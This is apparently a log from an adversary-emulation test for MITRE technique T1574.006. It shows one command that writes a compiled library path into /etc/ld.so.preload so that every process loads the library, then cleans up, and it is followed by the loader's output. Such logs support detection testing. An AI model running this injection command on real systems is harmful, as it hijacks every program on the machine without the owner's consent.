[+] Tactic ID   : T1574.006-1
[+] Technique   : Shared Library Injection via /etc/ld.so.preload
[+] Command     :
echo /tmp/LdPreload.so > /etc/ld.so.preload && gcc -shared -fPIC -o /tmp/LdPreload.so Dependencies/LdPreload.c && sleep 2 && rm -f /tmp/LdPreload.so && rm -f /etc/ld.so.preload
[+] Success
----- OUTPUT START -----
ERROR: ld.so: object '/tmp/LdPreload.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/LdPreload.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/LdPreload.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/LdPreload.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/LdPreload.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/LdPreload.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
Loaded T1574.006 Library successfully!
Unloading T1574.006 preload...
Loaded T1574.006 Library successfully!
Loaded T1574.006 Library successfully!
Unloading T1574.006 preload...
Loaded T1574.006 Library successfully!
ERROR: ld.so: object '/tmp/LdPreload.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/LdPreload.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
----- OUTPUT END -----
